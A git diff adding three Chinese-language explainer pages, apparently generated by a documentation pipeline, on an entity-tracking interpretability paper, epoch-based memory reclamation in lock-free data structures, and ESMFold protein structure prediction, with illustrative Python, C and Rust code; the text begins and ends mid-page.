+研究模型:**Gemma-2-2B**、**CodeLlama-13B**(机制分析主力)、**Llama-3.1-70B**(多操作行为)。代码开源:[PootieT/entity-tracking-mi](https://github.com/PootieT/entity-tracking-mi)。 + +--- + +## 核心发现一:非增量追踪(Non-incremental Tracking) + +### 假设对照 + +**跨 token(H1 vs H2)** + +- **H1(增量全局)**:从左到右读上下文时,最后一 token 的隐状态里编码了**所有箱子**的完整世界状态。 +- **H2(查询时局部)**:只有被问到的箱子相关信息,在 **query 变得明确之后**才动态拼起来。 + +**方法**:在 query 前最后一个 token(`the`)的残差流上训练线性 probe: + +- **Global probe**:对每个物体,预测它在哪个箱子(8 类,含「不在任何箱」)。 +- **Local probe**:对每个物体,预测它**是否在被查询的箱子**里(二分类)。 + +**结果(CodeLlama-13B)**:Local probe 非平凡准确率接近 **0.9**;Global probe 仅约 **0.3**(随机约 0.12)。说明模型**没有**维护可解码的全局状态表,但**能**解码「当前问的这个箱子」的局部答案。 + +**跨层(H3 vs H4)** + +- **H3**:若按层顺序处理多次局部操作,**更早的 prior state** 应在**更浅层**更可解码。 +- **H4**:多次操作在**同一层段并行**聚合,prior 与 final state 的 probe 峰值层相近。 + +实验支持 **H4**:看不到「越早的状态越早出现在浅层」的清晰阶梯,而是 query 末尾**并行**整合。 + +### 直觉总结 + +```text +你以为: DESCRIPTION → 更新状态 → OPERATION₁ → 更新 → … → QUERY → 读出 +实际上: DESCRIPTION + 所有 OPERATION →(几乎不维护表)→ QUERY 的 "the" → 并行捞信息 → 生成 +``` + +这与「自回归 = 逐步推理」的朴素想象不一致:**显式提到实体名**时,模型更倾向 lazy aggregation,而非 simulation。 + +--- + +## 核心发现二:三种操作的机制 + +### PUT:像「实体绑定电路」的亲戚 + +`PUT` 往已有箱子里**加入新物体**。作者用 **path patching** 追踪注意力头,复现 Prakash et al. (2024) 的四组头 **A/B/C/D**: + +| 组 | 位置与作用(简化) | +|----|-------------------| +| **A** | 末 token、深层:抬高目标物体 logit | +| **B** | 末 token、中层:把目标物体的 **order ID**(出现顺序)传给 A | +| **C** | query 里的 box ID、中层:传递位置信息给 B | +| **D** | 早期 box ID:扫 DESCRIPTION,绑定物体与箱子 | + +**PUT 与 DESCRIPTION 共用功能等价的子空间**传递位置信息(DCM + 子空间 patching),但具体注意力头集合重叠有限——**机制相似,实现不同**。 + +### REMOVE:全局抑制标签(最反直觉) + +正确 `REMOVE` 应让被删物体**不再被预测**。分析发现: + +1. 有 `REMOVE` 时,上下文里多数物体 logit **整体上升**(模型在「抬高提到过的物体」)。 +2. 被删物体的上升幅度**明显更小** → **相对排名下降** → 生成时被抑制。 +3. 关键:**即使 REMOVE 针对的不是当前 query 的箱子**,被删物体仍被抑制 → **全局移除(Global Remove)**,而非「从某箱局部删除」。 + +作者用 **三元 probe** 在物体/box token 上探测 `{不存在, 存在, 已移除}` 状态,发现 **object token 上的 remove tag** 因果有效;对 box ID 干预往往无效。`MOVE` 可理解为:对源箱加 remove tag,对目标箱加 exist tag。 + +### 为什么原 benchmark 测不出 bug + +原数据集约定:**每种物体在全仓库只出现一次**。全局删掉「罐子」与「从 2 号箱删掉罐子」在行为上等价——机制退化被数据设计**掩盖**了。 + +--- + +## 机制预测的新失败模式 + +论文设计三类**原 box 数据没有**的诊断场景: + +| 场景 | 例子要点 | 全局 REMOVE 为何失败 | +|------|----------|----------------------| +| **No-op Remove** | 帽子在 3 号箱,却写「从 0 号箱移除帽子」 | 仍全局抑制帽子,问 3 号箱时答错 | +| **Shared-label** | 0 号与 3 号箱都有 pill,只应从 0 号移除 | 两个 pill 都被抑制 | +| **Re-introduce** | 移除桃子后又 PUT 回 0 号箱 | 标签强度衰减 + 忽略操作顺序 | + +**Degeneration Rate (DR)** 在这些场景上很高(13B 上 No-op 约 **84%**)。对 object token 的 remove tag 做 **null-space 干预**可部分修复前两类(干预成功率 IS 约 **66–73%**),Re-introduce 更难(需正确排序多次操作)。 + +这也为 **Chain-of-Thought 改善 ET** 提供机制假说:CoT 把长上下文拆短,减轻 remove tag 随距离衰减(论文 Fig. 8:Box ID 条件 probe 准确率随操作链变长而下降)。 + +--- + +## 代码示例 1:用 Python 模拟 box 世界(正确 vs 全局 REMOVE) + +下面是一个**教学用**的极简世界状态机,对比「局部正确 REMOVE」与论文描述的「全局错误 REMOVE」: + +```python +from dataclasses import dataclass, field +from typing import Dict, Set, List + +@dataclass +class BoxWorld: + """增量维护:每个箱子一个集合 —— 人类/正确算法应有的样子。""" + boxes: Dict[int, Set[str]] = field(default_factory=dict) + + def put(self, box: int, obj: str) -> None: + self.boxes.setdefault(box, set()).add(obj) + + def remove_local(self, box: int, obj: str) -> None: + if box in self.boxes: + self.boxes[box].discard(obj) + + def query(self, box: int) -> List[str]: + return sorted(self.boxes.get(box, set())) + + +class GlobalRemoveLM: + """模仿论文中的退化机制:REMOVE 在物体名上打全局抑制标签。""" + def __init__(self, world: BoxWorld): + self.world = world + self.globally_removed: Set[str] = set() + + def remove_global(self, box: int, obj: str) -> None: + # 注意:忽略 box,只要提到 remove obj 就全局封禁 + self.globally_removed.add(obj) + self.world.remove_local(box, obj) # 局部也会删,但查询逻辑被全局集覆盖 + + def query_logits(self, box: int) -> Dict[str, float]: + scores = {o: 1.0 for o in self.world.query(box)} + for o in list(scores): + if o in self.globally_removed: + scores[o] = -1e9 # 全局抑制:不管在哪个箱 + return scores + + +# Shared-label 场景 +w = BoxWorld() +w.put(0, "pill") +w.put(3, "pill") + +lm = GlobalRemoveLM(w) +lm.remove_global(0, "pill") # 只想从 0 号箱移除 + +print("正确局部 query(3):", w.query(3)) # ['pill'] +print("全局 REMOVE query(3) 存活:", "pill" in lm.query_logits(3)) # False — 退化 +``` + +运行后你会看到:局部状态机认为 3 号箱仍有 `pill`,但「全局 REMOVE LM」在问 3 号箱时也会把 `pill` 压死——这正是论文 Table 1 中高 DR 的行为根源。 + +--- + +## 代码示例 2:线性 Probe 思路(概念复现) + +论文用线性 probe 区分 global vs local 表征。零基础可以理解成:**在固定层、固定 token 的隐向量上训练 logistic 回归,看能否解码某种结构信息**。 + +```python +import numpy as np +from sklearn.linear_model import LogisticRegression +from sklearn.model_selection import train_test_split +from sklearn.metrics import accuracy_score + +# X[i]:第 i 条样本在「query 前 the」token、第 layer 层的残差向量(示意) +# y_global[i]:物体 j 在哪个箱子(0-7) +# y_local[i]:物体 j 是否在被查询的箱子里(0/1) + +def train_probe(X, y, label: str) -> float: + X_tr, X_te, y_tr, y_te = train_test_split(X, y, test_size=0.2, random_state=0) + clf = LogisticRegression(max_iter=1000, class_weight="balanced") + clf.fit(X_tr, y_tr) + acc = accuracy_score(y_te, clf.predict(X_te)) + print(f"{label} probe accuracy: {acc:.3f}") + return acc + +# 论文定性结论(CodeLlama-13B, layer 中段)可概括为: +# local >> global(约 0.9 vs 0.3 非平凡准确率) +rng = np.random.default_rng(42) +N, D = 500, 512 +X_fake = rng.normal(size=(N, D)) +y_local = rng.integers(0, 2, size=N) +y_global = rng.integers(0, 8, size=N) + +train_probe(X_fake, y_local, "local (illustrative)") +train_probe(X_fake, y_global, "global (illustrative)") +``` + +真实实验需从模型 forward hook 提取残差流(仓库用 TransformerLens / NNsight)。要点不在绝对数字,而在**同一表征位置上 local 远强于 global**——这是拒绝 H1、支持 H2 的关键证据链。 + +--- + +## 方法工具箱(读论文时的「地图」) + +| 工具 | 用途 | 本文中的角色 | +|------|------|----------------| +| **Linear probing** | 检测隐状态是否编码某变量 | Global/local/prior state、三元 remove tag | +| **Path patching** | 因果追踪注意力头对 logit 的贡献 | PUT/DESCRIPTION 电路 A–D | +| **DCM + 子空间 patching** | 找传递 order ID 的低维子空间 | PUT 与 DESCRIPTION 子空间重叠 | +| **Logit/rank diff** | 比较有无 REMOVE 时排名变化 | 发现全局抑制而非局部删除 | +| **Amnesic probing 干预** | 投影到 probe 零空间,抹除信号 | 验证 remove tag 因果性、部分修复 DR | + +--- + +## 与相关工作的关系 + +```text +Kim & Schuster 2023 — box benchmark,证明 LM 有一定 ET 能力 + ↓ +Kim et al. 2024 — 代码预训练显著提升 ET + ↓ +Prakash et al. 2024 — binding「look-back」电路(无状态变更) + ↓ +本文 2605.30233 — 状态变更 + 非增量聚合 + REMOVE 全局退化 + ↓ +可延伸 — CoT/外部记忆/状态空间模型是否更接近增量 simulation? +``` + +玩具模型文献(Li et al. 2025)曾发现微调小模型可**按层**聚合置换状态;本文在**预训练大模型 + 显式实体名**设定下得到相反图景——说明**任务表述与训练分布**会根本改变内部算法。 + +--- + +## 对工程与应用的启示 + +### 1. 行为准确率 ≠ 可靠状态推理 + +在 box 类基准上「看起来会追踪」的模型,可能只是在 query 点做**启发式检索 + 标签抑制**,并未维护可复用的世界模型。部署到 Agent、游戏、机器人规划时,应用**机制启发的对抗样例**(no-op remove、重复标签、重新引入)做红队测试。 + +### 2. 长上下文多步操作的风险 + +Remove tag 随操作链变长而变弱(Box ID probe 线性下降),但 object token 上的退化信号相对稳定——模型更依赖**脆弱的物体级全局标签**。拆分子步骤(CoT)、缩短每段上下文、或引入**显式状态变量**(JSON/数据库/符号模块)可能更稳。 + +### 3. 训练与架构方向 + +论文讨论:是否在预训练中鼓励**潜式计算完整世界状态**(latent world states)、是否用**外部记忆**卸载 ET、以及 SSM/递归结构是否更适合真·增量追踪。对 RAG/Agent 设计者:不要把「LLM 读过就等于记住了正确状态」当作默认假设。 + +--- + +## 局限与开放问题 + +- 机制分析主力是 **CodeLlama-13B**;更大模型行为更好但退化仍在(70B Shared-label DR 仍约 **27%**)。 +- **REMOVE 的完整电路**尚未像 PUT 那样被 path patching 精确定位(附录 H.14 负面结果)。 +- 任务虽自然语言,但仍属**受控合成域**;国际象棋、真实对话中的 ET 是否同机制未知。 +- 干预修复是 **proof-of-concept**,未形成可部署的推理时补丁。 + +--- + +## 一句话带走 + +| 维度 | 结论 | +|------|------| +| 任务 | 自然语言 box 世界中的 PUT/REMOVE/MOVE 实体追踪 | +| 策略 | **非增量**:query 末 token 并行聚合,非逐 token 建世界表 | +| PUT | 类似已知 binding 电路,共享 order-ID 子空间 | +| REMOVE | **全局 remove tag** 抑制物体,非按箱局部删除 | +| 价值 | 机制预测新失败 → 设计更强评测 + 可干预修复 | +| 元教训 | **行为与机制分析应闭环**:测得准不够,还要问「怎么实现的、会在哪翻车」 | + +--- + +## 参考资料 + +- 论文:[arXiv:2605.30233](https://arxiv.org/abs/2605.30233) | [HTML 版](https://arxiv.org/html/2605.30233v1) +- 代码:[github.com/PootieT/entity-tracking-mi](https://github.com/PootieT/entity-tracking-mi) +- Box 基准:Kim & Schuster, *Entity Tracking in Language Models*, ACL 2023 +- Binding 电路:Prakash et al., 2024/2025 look-back 系列 +- ICML 2026 Poster:[icml.cc/virtual/2026/poster/64207](https://icml.cc/virtual/2026/poster/64207) diff --git a/src/content/docs/papers/epoch-based-reclamation-2007.md b/src/content/docs/papers/epoch-based-reclamation-2007.md new file mode 100644 index 000000000..7336b23fb --- /dev/null +++ b/src/content/docs/papers/epoch-based-reclamation-2007.md @@ -0,0 +1,288 @@ +--- +title: Practical Lock-Freedom — Epoch-based Reclamation(按「时代」延迟回收共享内存) +来源: https://www.cl.cam.ac.uk/research/srg/netos/papers/2007-cpwl.pdf +日期: 2026-06-13 +子分类: 内核与虚拟化 +分类: 操作系统 +provenance: pipeline-v3 +--- + +## 是什么 + +**Epoch-based Reclamation(EBR,按时代回收)** 是一套让用户态 lock-free 数据结构**安全 `free` 已删节点**的机制。它最早由 Keir Fraser 在博士论文 *Practical Lock-Freedom*(2003)里系统化,并作为 Cambridge **MCAS / WSTM / OSTM** 非阻塞 API 的默认回收方案,出现在后来的期刊论文 *Concurrent Programming Without Locks*(Fraser & Harris,**TOCS 2007**;你手上的 PDF 即此文)。 + +日常类比:**夜市换班的三只回收桶**。 + +- 摊主(线程)每开始一轮「碰共享货架」的工作,先看门口黑板上的**班次号**(global epoch),记在自己小本子上(local epoch)。 +- 某件货从货架上撤下时,**不能当场扔进碎纸机**——可能还有顾客正拿着旧价签比价。摊主把废货扔进**当前班次对应的回收桶**(limbo list)。 +- 等黑板确认「**所有正在干活的摊主都看过最新班次**」,**上上班次**那只桶里的货才能统一销毁——因为再早一班次的顾客,最晚也在「上一班次」结束前离开了货架区。 + +技术上,EBR 解决的是 lock-free 里的经典难题:**读者拿着裸指针遍历时,写者不能把节点立刻 `free`**。EBR 把「等所有读者离开」这件事,编码成**全局 epoch 计数 + 每线程本地 epoch + 三个 limbo 桶**,读者路径几乎不用登记「我正在看哪本书」(对比 Hazard Pointer 的前台卡片)。 + +## 为什么重要 + +不理解 EBR,下面这些事很难讲清楚: + +- 为什么 **crossbeam-epoch**、**Folly `folly::Synchronized`** 周边、不少 C++ lock-free 容器默认走 epoch 而不是 hazard pointer +- 为什么 Fraser/Harris 能在 2007 年做出**与精细锁设计性能相当甚至更好**的 skip-list、红黑树——回收开销若用 SMR/HP 每条边都 `memory barrier`,BST 实测会慢 **20%+**(Fraser 论文原话) +- 为什么 EBR 常被称作 **QSBR(Quiescent-State Based Reclamation)的自动化版**:程序员不用手写「静默点」,库在临界区入口帮你记账 +- 为什么用户态 EBR **不是严格 lock-free**:一个线程在临界区里被挂起,可能**永远拖住回收**——这和 Linux RCU 在内核里「靠调度切换推进 grace period」形成对照 + +JPDC 2007 的横评(Hart 等)结论也很直白:**没有全局最优的回收方案**;EBR 在读多、读者开销敏感、能接受偶发内存延迟时往往占优。 + +## 核心概念 + +### 1. Limbo list(炼狱单)——先登记,后销毁 + +对象从共享堆上逻辑删除后,进入当前 epoch 的 **limbo list**,而不是立刻 `free`。思想来自 Kung & Lehman 的并行 GC、Pugh skip-list 等早期工作;Fraser 的改进是:**用 epoch 判断何时 limbo 里再也没有合法引用**,并只维护 **三个** 桶循环复用,改善 cache locality。 + +删除节点的责任规则(skip-list 特例): + +- 正常:谁 CAS 成功摘掉节点,谁把它扔进 limbo。 +- 插入与删除并发:节点可能「还在往高层插」就被逻辑删了。此时用 per-node **deferral flag**:插入与删除都尝试置位,**后完成的一方**负责入 limbo——因为只有两个操作可能创建/销毁共享引用。 + +### 2. Global epoch 与 local epoch + +- **Global epoch** `e`:全系统当前「时代」编号(通常 `mod 3` 循环)。 +- **Local epoch**:每个线程在进入**访问共享对象的操作**时,把本地 epoch 更新为当前的 `e`。 +- **关键不变量**:对象进入 limbo 时,共享堆里已没有指向它的引用;仍可能存在的引用只能是 **(i) 私有的**,且 **(ii) 属于在对象入 limbo 之前就已开始当前操作的线程**。 + +因此:当**所有正在临界区里的线程**的 local epoch 都 ≥ 当前 global epoch 时,**两个 epoch 之前**填满的那只 limbo 桶可以安全清空。 + +### 3. 为什么需要三个桶,而不是两个? + +直觉上「大家都看到 epoch `e` 了,上一桶就能回收」——**不够**。线程进入新 epoch 的时刻**不同步**:在任意时刻,往往有线程正从 `e-1` 迁到 `e`,它们手里还可能握着 `e-1` 时代 limbo 对象的私有指针。所以要再等一轮,才安全复用 `e-1` 的桶。Fraser 用 **三个 limbo list** 轮转;Hart 等的图示把这三段称为 **fuzzy barrier**。 + +### 4. 推进 epoch 的「模糊屏障」 + +线程每次进入临界区时,以一定概率扫描「当前正在临界区内的线程列表」: + +- 若每个这样的线程的 local epoch **都等于** global epoch,则把**最老**的 limbo list 并入 free list,并 `global_epoch++`。 +- **不参与扫描的线程**:当前不在临界区、处于 quiescent 的线程——避免「睡觉的线程」阻塞回收(QSBR 里程序员要保证静默;EBR 在实现里排除它们)。 + +回收工作**分散到所有 mutator**,不需要专职 GC 线程。 + +### 5. 与论文其它部分的边界 + +2007 年 PDF 的主体是 **MCAS / WSTM / OSTM** 三套非阻塞 API;EBR 在实现章(Fraser 博士论文 §5.2.3)负责**应用层节点**回收。与之对照: + +| 对象类型 | 回收方式 | +|----------|----------| +| MCAS/FSTM **操作描述符**(大块、短命) | 引用计数,用完即复用 | +| 跳表/红黑树 **节点**、STM 对象块 | **EBR** | +| 需要严格 lock-free 进度、不能容忍卡住 | 改用 Michael SMR / Hazard Pointer(读者每条边要 announce) | + +## 代码示例 + +### 示例 1:读者 / 写者共用的 EBR 临界区骨架(C 风格伪代码) + +下面是把 Fraser 描述翻译成最常见的 **enter → 用结构 → retire → leave** 四件套。真实库(如 crossbeam-epoch)会再加 pin 计数、缓存行对齐等细节。 + +```c +/* 每线程状态 */ +typedef struct { + uint64_t local_epoch; /* 本线程已观察到的时代 */ + bool in_critical; /* 是否在访问共享 lock-free 结构 */ +} tls_ebr_t; + +static _Atomic uint64_t global_epoch; +static limbo_list_t limbo[3]; /* 三个回收桶,下标 epoch % 3 */ + +void ebr_enter(tls_ebr_t *tls) { + tls->in_critical = true; + tls->local_epoch = atomic_load_explicit(&global_epoch, memory_order_acquire); + /* 以一定概率尝试推进时代并清空最老 limbo */ + ebr_try_advance(); +} + +void ebr_leave(tls_ebr_t *tls) { + tls->in_critical = false; +} + +void ebr_retire(void *ptr) { + uint64_t e = atomic_load_explicit(&global_epoch, memory_order_relaxed); + limbo[e % 3].push(ptr); /* 扔进当前时代的桶 */ +} + +/* 读侧:遍历 lock-free 链表 */ +node_t *ebr_search(node_t *head, key_t key) { + ebr_enter(&my_tls); + node_t *cur = head; + while (cur && cur->key < key) + cur = atomic_load_explicit(&cur->next, memory_order_acquire); + ebr_leave(&my_tls); + return cur; +} + +/* 写侧:逻辑删除后 retire */ +bool ebr_delete(node_t **head, key_t key) { + ebr_enter(&my_tls); + /* ... CAS 从链表摘掉 node ... */ + if (removed) + ebr_retire(node); + ebr_leave(&my_tls); + return removed; +} +``` + +读者路径只有 `enter/leave` 里对 epoch 的一次观察;**没有** Hazard Pointer 那种「每跳一步写一张卡片」的开销。 + +### 示例 2:Rust `crossbeam-epoch` 中的 Guard 模式 + +工业界最常被引用的 EBR 实现是 **crossbeam-epoch**(API 受 Fraser 方案启发)。`Guard` 表示「我处在某个 epoch 的保护下,别人不能 free 我正要访问的对象」: + +```rust +use crossbeam_epoch::{self as epoch, Atomic, Owned, Shared}; + +struct Node { + value: i32, + next: Atomic, +} + +fn push(stack: &Atomic, value: i32) { + let mut guard = epoch::pin(); // 等价于 ebr_enter + loop { + let head = stack.load(Ordering::Acquire, guard); + let mut node = Owned::new(Node { value, next: Atomic::null() }); + node.next.store(head, Ordering::Release); + if stack + .compare_exchange(head, node, Ordering::Release, Ordering::Relaxed, guard) + .is_ok() + { + break; + } + } +} + +fn pop(stack: &Atomic) -> Option { + let guard = epoch::pin(); + loop { + let head = stack.load(Ordering::Acquire, guard); + if head.is_null() { + return None; + } + let next = unsafe { head.deref() }.next.load(Ordering::Acquire, guard); + if stack + .compare_exchange(head, next, Ordering::Release, Ordering::Relaxed, guard) + .is_ok() + { + unsafe { guard.defer_destroy(head) }; // 等价于 ebr_retire + return Some(unsafe { head.deref() }.value); + } + } +} +``` + +`pin()` 可能触发全局 epoch 推进;`defer_destroy` 把节点排进当前 limbo,待 grace period 结束后由后台批量释放。 + +### 示例 3:`ebr_try_advance` 里「全员对齐」的简化逻辑 + +```c +void ebr_try_advance(void) { + if (random() % ADVANCE_PERIOD != 0) + return; + + uint64_t g = atomic_load_explicit(&global_epoch, memory_order_relaxed); + for (each thread t where t.in_critical) { + if (t.local_epoch != g) + return; /* 还有人滞留在旧时代,不能推进 */ + } + /* 所有活跃读者都已看到 g → 回收 (g-2) mod 3 的 limbo */ + limbo[(g + 1) % 3].flush_to_allocator(); + atomic_store_explicit(&global_epoch, g + 1, memory_order_release); +} +``` + +真实实现要处理线程注册/注销、ABA、内存序;但**语义核心**就是这段:「**活跃临界区**里的线程 local epoch 全追上 global,才清空最老桶」。 + +## 与其它回收方案对比 + +| 维度 | EBR(Fraser) | Hazard Pointer(Michael 2004) | QSBR | Linux RCU | +|------|---------------|-------------------------------|------|-----------| +| 读者开销 | 极低(进/出临界区记 epoch) | 每指针一次 publish + 验证 | 需手写 quiescent 点 | 读侧常为零指令 | +| 写者/回收 | 分散扫描 + limbo | 扫全局 hazard 表 | 等所有线程静默 | `call_rcu` 等 grace period | +| 内存上界 | **无严格上界**(慢线程卡住) | 有界(retired 队列长度可控) | 无界 | 内核可踢线程 | +| 严格 lock-free | **否**(卡住可饿死回收) | 是 | 否 | N/A | +| 典型场景 | 用户态读多写少容器 | 内存敏感、要进度保证 | 手工标注的简单路径 | 内核子系统 | + +Fraser 的权衡很明确:EBR 换掉了 SMR/HP 在**每条边上**的 `memory barrier`,换来**弱一些的进度保证**和**可能的内存滞留**。 + +## 踩过的坑 + +1. **临界区范围划错**:`ebr_enter/leave` 必须包住**所有**可能解引用共享指针的代码;少包一行就是 use-after-free。 + +2. **把 EBR 当成严格 lock-free**:论文坦诚——临界区内被抢占的线程会阻止 epoch 前进,limbo 涨满后**全员** eventually 停住。实时或硬进度需求应换 HP。 + +3. **只准备两个 limbo 桶**:会过早复用仍在读者私有引用里的对象;**三个**是数学上紧的常数,不是随便拍的。 + +4. **与引用计数混用节点**:EBR 管「已从共享结构摘掉」的节点;描述符等短命大块 Fraser 用引用计数——别对同一对象两套方案打架。 + +5. **忘记 memory order**:`global_epoch` 的 publish 与读 `next` 指针的 acquire 必须配对;x86 上「能跑」不代表 ARM 安全。 + +6. **线程爆炸时扫描成本**:`ebr_try_advance` 要扫活跃线程表;线程数上百时,推进 epoch 的摊销成本上升——JPDC 2007 横评里 EBR 在**高线程数**下不如 HP 的场景即源于此。 + +## 在 Fraser & Harris 2007 论文中的位置 + +该 PDF 的重点是证明:**用当今 CPU 都有的 CAS 等原语**,可以搭出实用的非阻塞 skip-list、红黑树,并与高性能锁实现同台竞技。EBR 是「让动态节点真正可分配/释放」的那块拼图: + +- **§1.1** 提到 Michael SMR、Herlihy pass-the-buck 等「延迟释放直到确认无读者」的家族; +- 实现章说明对**应用数据**默认 EBR,对**操作描述符**用引用计数; +- 开源实现曾覆盖 Alpha、IA-32、IA-64、MIPS、PowerPC、SPARC(`http://www.cl.cam.ac.uk/netos/lock-free`)。 + +读 PDF 时可以把 **API 设计**(MCAS/WSTM/OSTM)与 **EBR** 分开学:前者教「怎么无锁改多字」;后者教「改完的烂摊子怎么安全 `free`」。 + +## 适用 vs 不适用 + +**适用**: + +- 读多写少的 lock-free 哈希、跳表、队列(用户态) +- 愿用少量内存换读者极致轻量(相对 HP) +- 已有 `crossbeam`、`folly` 等成熟 EBR 库,不想自研 HP 槽位管理 + +**不适用**: + +- 必须证明**严格 lock-free / wait-free** 进度 +- 线程数极大且频繁推进 epoch,扫描成为热点 +- 不能容忍「一个死循环线程拖住全部回收」——用 HP 或带超时的 QSBR +- 有 GC 的运行时——直接用 GC,不必 EBR + +## 历史脉络(简表) + +| 年份 | 里程碑 | +|------|--------| +| 1980 | Kung & Lehman — limbo list 思想 | +| 2002 | Michael — SMR / Hazard Pointer 雏形 | +| 2003 | Fraser 博士论文 — **EBR 系统化**,三桶 + epoch 扫描 | +| 2007 | Fraser & Harris TOCS — 非阻塞 API + EBR 工程验证 | +| 2007 | Hart JPDC — QSBR / EBR / HP **公平横评** | +| 2010s+ | crossbeam-epoch、各语言 lock-free 库广泛采用 | + +## 学到什么 + +1. **延迟释放是 lock-free 的必修课**:无锁只解决「互斥」;**何时 `free`** 是第二战场。EBR 用「时间分片(epoch)」代替「空间登记(hazard slot)」。 + +2. **三个桶不是实现细节,是不变量的一部分**:理解「两桶不够」的并发窗口,才算真懂 EBR。 + +3. **进度保证与性能永远交易**:Fraser 宁可选「非严格 lock-free 的 EBR」也要砍掉 20% 的 SMR barrier 税——说明**读路径热点**往往比形式化进度更重要。 + +4. **和 RCU 同族不同命**:都是 grace period;RCU 绑内核调度,EBR 绑用户态线程表与 probabilistic advance。 + +## 延伸阅读 + +- 期刊论文(本文来源):[Concurrent Programming Without Locks (PDF)](https://www.cl.cam.ac.uk/research/srg/netos/papers/2007-cpwl.pdf) — Fraser & Harris, TOCS 2007 +- 博士论文全文:[Practical lock-freedom (UCAM-CL-TR-579)](https://www.cl.cam.ac.uk/techreports/UCAM-CL-TR-579.pdf) — EBR 细节在 §5.2.3 +- 横评:[Performance of memory reclamation for lockless synchronization (JPDC 2007)](https://csng.cs.toronto.edu/publication_files/0000/0159/jpdc07.pdf) +- 实现参考:[crossbeam-epoch 文档](https://docs.rs/crossbeam-epoch/latest/crossbeam_epoch/) + +## 关联 + +- [[hazard-pointers-2004]] — EBR 的主要替代方案;读者有界、严格 lock-free +- [[rcu-mckenney-2017]] — 内核侧 grace period;读侧更轻、与调度器耦合 +- [[michael-scott-queue]] — 经典 lock-free 队列;回收方案常配 EBR 或 HP +- [[jemalloc-evans-2006]] — 另一篇「多线程下别抢同一把锁」的 Cam 系性能工程 + +## 反向链接 + + + +(暂无反向链接) diff --git a/src/content/docs/papers/esmfold-2022.md b/src/content/docs/papers/esmfold-2022.md new file mode 100644 index 000000000..dea673365 --- /dev/null +++ b/src/content/docs/papers/esmfold-2022.md @@ -0,0 +1,209 @@ +--- +title: "Evolutionary-Scale Prediction of Atomic-Level Protein Structure with a Language Model" +来源: https://www.science.org/doi/10.1126/science.ade2574 +日期: 2026-06-13 +分类: 机器学习 +子分类: 生物信息 +provenance: pipeline-v3 +--- + +# ESMFold:用语言模型预测蛋白质结构 + +## 背景:蛋白质折叠问题 + +想象一下:你有一串项链,由 20 种不同颜色的珠子组成。这串项链有多长,取决于你有多少颗珠子——从几十颗到几千颗不等。现在,把这串项链随意扔在桌上,它自己会卷成一个特定的形状。这个"从珠子序列自动卷成特定形状"的过程,就是**蛋白质折叠**。 + +在生物体内,蛋白质的**功能取决于它的形状**。就像钥匙的形状决定它能开哪把锁一样,蛋白质的三维结构决定它能做什么。如果能从"珠子序列"直接预测出"最终形状",就等于掌握了理解生命的一把钥匙。 + +2020 年,DeepMind 的 AlphaFold2 震惊了世界。它主要依赖**多重序列比对(MSA)**——也就是把同一类蛋白质的"亲戚序列"找出来,对比它们的差异,从而推断哪些位置"必须一起变化"(因为结构要保持稳定)。但这有个问题:找"亲戚序列"非常耗时,预测一个蛋白质可能需要几个小时。 + +ESMFold 的做法完全不同。它把蛋白质序列当成一门"语言",用一个**蛋白质语言模型**直接预测结构,不需要找"亲戚"。 + +## 核心概念 1:蛋白质语言模型 + +### 类比:学语言的两种方式 + +学一门新语言,你有两种方法: + +1. **对比学习**:同时读 100 个不同国家的同一篇文章的翻译,对比它们的差异来推断语法。这就像 AlphaFold2 用的 MSA 方法。 +2. **海量阅读**:直接读 100 亿句话,读得够多之后,自然就能猜出下一个词是什么,也理解了语言的"结构"。ESMFold 用的就是这种方法。 + +ESMFold 基于 **ESM-2** 模型,这是一个用 Transformer 架构训练的蛋白质语言模型。训练方式是"填空格"——把一段蛋白质序列中的某些氨基酸"遮住",让模型猜被遮住的是什么。 + +```python +# 类比:给语言模型"填空格" +# 假设蛋白质序列是: A-R-G-I-N-I-N +# 遮住后变成: A-?-G-?-?-?-N +# 模型的任务是猜出每个"?"处应该填什么氨基酸 + +sequence = "ARGININ" +masked_sequence = "A?G???" +# 训练时,模型会看到大量这样的"填空题" +# 经过在 2.8 亿条蛋白质序列上的训练 +# 模型学会了氨基酸之间的"搭配规则" +``` + +ESM-2 有从 8000 万到 150 亿参数的多个版本。论文发现,当模型规模达到 **150 亿参数**时,模型内部表示中会"自然涌现"出蛋白质的结构信息——就像一个人学语言学得足够深之后,不仅会说话,还理解了语法和逻辑。 + +## 核心概念 2:从语言表示到 3D 结构 + +### 类比:从"文字描述"画出"三维模型" + +ESM-2 模型理解蛋白质序列后,输出的不是结构坐标,而是一系列**注意力图**——显示哪些位置的氨基酸"彼此关注"。这些注意力模式隐含了哪些氨基酸在空间中距离很近的信息。 + +ESMFold 在这之上加了一个 **Structure Module**,它做的事情就像从文字描述构建 3D 模型: + +1. **输入**:ESM-2 对每条序列产生的"理解"(嵌入表示) +2. **处理**:通过一个迭代 refinment 的神经网络,逐步调整每个原子的位置 +3. **输出**:每个原子的 3D 坐标(x, y, z),生成 .pdb 文件 + +```python +# 使用 ESMFold 预测蛋白质结构的基本流程 +import esm + +# 1. 加载预训练模型(以 ESMFold 为例) +model = esm.pretrained.esmfold_v1() +model.eval() + +# 2. 输入蛋白质序列(用单字母氨基酸代码) +# 例如:肌红蛋白(Myoglobin)的前 20 个氨基酸 +sequence = "MVLSEGEWQLVLNVWGA" + +# 3. 直接预测结构(不需要 MSA!) +prediction = model.infer_pdb(sequence) + +# 4. 结果保存为 PDB 文件(蛋白质 3D 坐标的标准格式) +with open("myoglobin.pdb", "w") as f: + f.write(prediction) + +# 运行时间:约 3 秒(对比 AlphaFold2 需要数小时) +``` + +## 核心概念 3:为什么这么快? + +AlphaFold2 的慢在于第一步:为每条序列做 MSA 搜索。它需要在庞大的数据库(如 UniRef)中查找相似序列,这就像你要写一篇文章,需要先读遍全图书馆找参考资料。 + +ESMFold 不需要这步。它就像读过全图书馆的人,看到序列后直接凭"记忆"写出结论。 + +```python +# 速度对比示意 +import time + +def alphafold2_predict(sequence, database): + """AlphaFold2:需要先搜索数据库找相似序列""" + start = time.time() + msa = search_sequence_against_database(sequence, database) # 耗时步骤 + structure = alphafold2(msa) + elapsed = time.time() - start + return structure, elapsed + +def esmfold_predict(sequence, model): + """ESMFold:直接前向传播""" + start = time.time() + embeddings = model.encode(sequence) # 模型内部"理解"序列 + structure = model.decode(embeddings) # 从嵌入中"翻译"出结构 + elapsed = time.time() - start + return structure, elapsed + +# 实际测试(论文中的数据): +# AlphaFold2: ~3 hours per protein +# ESMFold: ~3 seconds per protein +# 加速比: ~3600 倍 +``` + +## 核心概念 4:ESM 大科学项目——结构即涌现 + +ESMFold 论文最震撼的发现不是"它更快",而是 **"随着模型变大,结构信息自然涌现"**。 + +作者训练了从 8000 